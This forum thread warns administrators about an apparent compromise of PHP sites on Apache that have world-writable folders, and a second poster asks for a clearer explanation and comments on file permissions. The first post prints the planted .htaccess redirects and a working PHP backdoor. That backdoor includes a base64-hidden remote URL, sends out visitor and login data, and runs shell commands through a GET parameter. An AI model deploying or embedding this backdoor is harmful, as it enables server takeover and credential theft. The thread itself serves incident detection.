Security Exploit Heads Up...php/apache

[iTec]

This does not just affect IPB. I have seen this also affecting other programs as well. The key things I have noticed is that you only seen the .htaccess files and the associated call back scripts in folders chmod 777. Files that are changed/edited are also chmod 777.

So this has affected photo gallery programs, upload folders on forums etc.

Each folder that is attacked will have a .htaccess file added

example of the .htaccess file

Options -MultiViews
ErrorDocument 404 //pics/albums/userpics/download.php


Another .htaccess file example

Options -MultiViews
ErrorDocument 404 //foldername/includes.php
Options -MultiViews
ErrorDocument 404 //foldername/messages.php

as well as any number of php files which the .htaccess file calls to. Some of the file names used include guest.php, config.php, configs.php, includes.php, include.php, report.php, date.php, time.php, among others.

Sample of callback code being found (slightly edited < > removed

?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}

Folders/files that are at least 755 do not seem to be touched. But if you find this on one site, check the whole server as this seems to be a serverwide problem on afflicted servers.

Another thing there will usually be parse errors reported on an affected server. This is an indication that the server has been compromised and files are being edited. In one case, the config_global.php file was edited and the MySQL info removed, in another case, the skin_global.php was edited and left basically blank.

So...basically ANY php script/folder that is chmod 777 is vulnerable and it appears that the only way to prevent this, is to have files/folders chmod to at least 755 (if not 644)

Another thing, all the aforementioned files will be owned by apache. Not the site login.

 

[nobaloney]

This does not just affect IPB. I have seen this also affecting other programs as well.

Have you described this exploit anywhere? Certainly there's no description in this thread. What does this exploit do?

Another thing there will usually be parse errors reported on an affected server. This is an indication that the server has been compromised and files are being edited. In one case, the config_global.php file was edited and the MySQL info removed, in another case, the skin_global.php was edited and left basically blank.

The above looks as if it may be a description of the exploit, but I still don't see a clear description. Can you make the exploit itself clearer?

the only way to prevent this, is to have files/folders chmod to at least 755 (if not 644)

Files can and should be chmod 644. If directories (Windows-users call them folders) aren't chmod 755, then nothing can enter them. A file inside a subdirectory chmod 644 can't be modified so it's quite safe. Unfortunately it can't be read either.

Jeff